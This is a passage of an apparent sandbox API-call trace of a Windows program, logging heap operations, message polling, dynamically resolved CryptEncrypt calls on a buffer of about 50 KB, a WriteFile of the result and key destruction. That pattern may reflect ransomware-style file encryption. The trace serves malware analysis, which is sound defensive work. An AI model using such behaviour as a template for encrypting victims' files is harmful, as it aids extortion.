0x2a71bd8 [0149.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0149.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0149.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0149.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0149.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0149.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0149.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0149.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0149.317] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a745e0 | out: hHeap=0x2af0000) returned 1 [0149.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.317] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0149.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0149.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0149.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0149.318] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0149.318] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0149.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0149.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0149.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0149.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0149.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0149.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0149.318] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0149.318] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0149.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0149.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0149.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0149.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0149.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0149.318] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0149.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0149.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa3d8 [0149.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0149.318] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0149.319] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.319] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0149.319] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0149.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0149.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0149.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0149.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0149.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0149.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0149.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0149.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0149.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0149.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0149.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0149.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0149.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0149.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0149.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0149.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0149.322] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0149.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0149.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa480, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0149.323] CryptEncrypt (in: hKey=0x9e2278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xc550, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xc558) returned 1 [0149.323] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.323] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.323] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.323] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.323] CharLowerBuffW (in: lpsz="byte[50520]", cchLength=0xb | out: lpsz="byte[50520]") returned 0xb [0149.323] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.324] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.324] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.324] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.324] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.324] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.324] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.324] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa3f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0149.324] CryptEncrypt (in: hKey=0x9e2278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xc550, dwBufLen=0xc558 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xc558) returned 1 [0149.345] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.345] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.345] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.345] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.346] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.358] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.358] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.358] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0149.358] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.358] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0149.358] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.358] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.359] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0149.359] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.359] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0149.359] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.359] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.359] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.359] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.359] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.359] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.359] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.359] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.359] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.359] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.359] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.359] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.363] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.363] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.363] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.364] WriteFile (in: hFile=0x4fc, lpBuffer=0x2aaf410*, nNumberOfBytesToWrite=0xc558, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aaf410*, lpNumberOfBytesWritten=0x8cf5e4*=0xc558, lpOverlapped=0x0) returned 1 [0149.365] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.366] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.366] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0149.366] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.366] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0149.366] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.366] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.366] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.366] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0149.366] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.366] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0149.366] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0149.366] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0149.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa3a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0149.366] CryptDestroyKey (hKey=0x9e2278) returned 1 [0149.366] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.366] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, 